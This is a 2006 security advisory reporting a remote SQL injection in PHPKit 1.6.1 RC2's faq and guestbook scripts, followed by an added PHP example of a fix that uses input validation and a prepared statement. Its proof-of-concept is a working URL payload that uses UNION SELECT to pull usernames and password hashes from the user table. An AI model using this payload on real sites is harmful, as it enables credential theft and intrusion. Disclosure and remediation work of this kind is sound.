securityvulns SECURITYVULNS:DOC:15016
Nov 14, 2006 - 12:00 a.m.

PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit


+--------------------------------------------------------------------+

  • Affected Software: PHPKit 1.6.1 RC2
  • Vendor: http://www.phpkit.de/
  • Class: Remote SQL Injection
  • Risk: high
  • Found by: Philipp Niedziela
  • Contact: webmaster[at]bb-pcsecurity[.]de

+--------------------------------------------------------------------+

SQL-INJECTION IN SEVERAL FILES:

  • guestbook/print.php
  • faq/faq.php
  • more (but untested!)

+--------------------------------------------------------------------+

  • POC:

+--------------------------------------------------------------------+

  /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
  1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
  FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1

  • Solution:
    -> Install Hack_Block (search google :))
    -> escape the variables in your SQL statements
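
One way to apply the second fix to a numeric parameter such as catid, shown as an added example that is not PHPKit's code or part of the original advisory: validate the value as an integer, then bind it in a prepared statement. The table faq_entries, its columns, the function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Stand-in database (in-memory SQLite) with constructed sample rows.
// faq_entries and its columns are hypothetical, not PHPKit's schema.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE faq_entries (id INTEGER PRIMARY KEY, cat_id INTEGER, question TEXT)');
    $db->exec("INSERT INTO faq_entries (cat_id, question) VALUES
               (1, 'How do I register?'), (2, 'How do I reset my password?')");
    return $db;
}

// Layer 1: catid is a category number, so accept only a positive integer.
// Arrays (catid[]=...), quotes, spaces and SQL keywords all fail validation.
function parse_catid($raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Layer 2: bind the value as a typed parameter instead of concatenating it
// into the SQL string, so it cannot change the structure of the statement.
function faq_questions(PDO $db, $rawCatid): array {
    $catid = parse_catid($rawCatid);
    if ($catid === null) {
        return []; // rejected; a real handler would also log it and answer 400
    }
    $stmt = $db->prepare('SELECT question FROM faq_entries WHERE cat_id = :catid');
    $stmt->bindValue(':catid', $catid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demo_db();
// Constructed inputs: a legitimate id, a value shaped like the PoC above
// (quote followed by UNION SELECT), and a non-numeric value.
foreach (['2', "-1' UNION SELECT 1 --", 'abc'] as $input) {
    printf("%-28s => %s\n", var_export($input, true),
           json_encode(faq_questions($db, $input)));
}
```

Only the first input returns a row; the other two are rejected before any query runs.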

+--------------------------------------------------------------------+

  • Greets and Thanks: /str0ke

+------------------------[ E O F ]----------------------------------+